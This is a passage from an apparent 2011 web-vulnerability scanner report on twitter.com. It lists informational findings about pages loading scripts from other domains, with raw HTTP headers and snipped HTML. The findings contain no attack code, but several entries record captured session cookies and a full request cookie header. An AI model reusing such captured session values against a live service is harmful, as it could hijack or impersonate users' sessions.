Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.370. http://twitter.com/Simply_b06 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Simply_b06

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225007-69414-28796
ETag: "24db63c3097b33b2dc035ce49f9408ff"
Last-Modified: Fri, 28 Jan 2011 14:30:08 GMT
X-Runtime: 0.01086
Content-Type: text/html; charset=utf-8
Content-Length: 36440
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.371. http://twitter.com/Simply_b06/status/29173383425949696 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Simply_b06/status/29173383425949696

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225011-27514-8303
ETag: "296e04489c61ead9a1933e485fa4bd22"
Last-Modified: Fri, 28 Jan 2011 14:30:11 GMT
X-Runtime: 0.07568
Content-Type: text/html; charset=utf-8
Content-Length: 13710
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6DGNzcmZfaWQiJTVlM2JiNjY4%250ANWU3MmNhZmY3NzhhY2E3ODRiNDgwODdhOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--6d295a54df06def6a97568ac94ecdce0d4dc8a97; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.372. http://twitter.com/Simply_b06/status/29173383425949696 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Simply_b06/status/29173383425949696

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Simply_b06/status/29173383425949696 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234596-16868-23421
ETag: "d0ff05884b63e709e06668dcb7001785"
Last-Modified: Fri, 28 Jan 2011 17:09:56 GMT
X-Runtime: 0.07980
Content-Type: text/html; charset=utf-8
Content-Length: 13580
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6FWluX25ld191c2VyX2Zsb3cw%250AOgxjc3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoM%250AdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5%250AYzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgz%250ATvDMLQE%253D--5337bd74a80b6d00492c33d51a083c0601ae7f45; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.373. http://twitter.com/Siobhan_Magnus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Siobhan_Magnus

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266023-80188-44224
ETag: "ccd41e2f423be9ffd34f56366edc99cd"
Last-Modified: Sat, 29 Jan 2011 01:53:43 GMT
X-Runtime: 0.00959
Content-Type: text/html; charset=utf-8
Content-Length: 49563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.374. http://twitter.com/SlexAxton previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/SlexAxton

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225045-59196-5393
ETag: "507dff22fcced375038cdd9631235460"
Last-Modified: Fri, 28 Jan 2011 14:30:45 GMT
X-Runtime: 0.00969
Content-Type: text/html; charset=utf-8
Content-Length: 49927
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.375. http://twitter.com/StarWrit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/StarWrit

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265998-47037-26209
ETag: "98f418b00049e64d718057714c24d78d"
Last-Modified: Sat, 29 Jan 2011 01:53:18 GMT
X-Runtime: 0.01212
Content-Type: text/html; charset=utf-8
Content-Length: 69129
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.376. http://twitter.com/Support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Support

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296099941/javascripts/dismissable.js?1296104033
http://a0.twimg.com/a/1296099941/javascripts/geov1.js?1296104033
http://a2.twimg.com/a/1296099941/javascripts/api.js?1296104033
http://a2.twimg.com/a/1296099941/javascripts/lib/gears_init.js?1296104033
http://a2.twimg.com/a/1296099941/javascripts/lib/jquery.tipsy.min.js?1296104033
http://a3.twimg.com/a/1296099941/javascripts/lib/mustache.js?1296104033
http://a3.twimg.com/a/1296099941/javascripts/twitter.js?1296104033
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-79439-58935
ETag: "6f3f0f6d45a5a9149a4d122ad96ea840"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01685
Content-Type: text/html; charset=utf-8
Content-Length: 51752
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296099941/javascripts/twitter.js?1296104033" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296099941/javascripts/lib/jquery.tipsy.min.js?1296104033" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296099941/javascripts/lib/gears_init.js?1296104033" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296099941/javascripts/lib/mustache.js?1296104033" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296099941/javascripts/geov1.js?1296104033" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296099941/javascripts/api.js?1296104033" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296099941/javascripts/lib/mustache.js?1296104033" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296099941/javascripts/dismissable.js?1296104033" type="text/javascript"></script>
...[SNIP]...

18.377. http://twitter.com/Svantasukhai previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Svantasukhai

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-92538-25020
ETag: "b5b7378e54ede43eec0f6508eb5d2185"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.00759
Content-Type: text/html; charset=utf-8
Content-Length: 29522
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
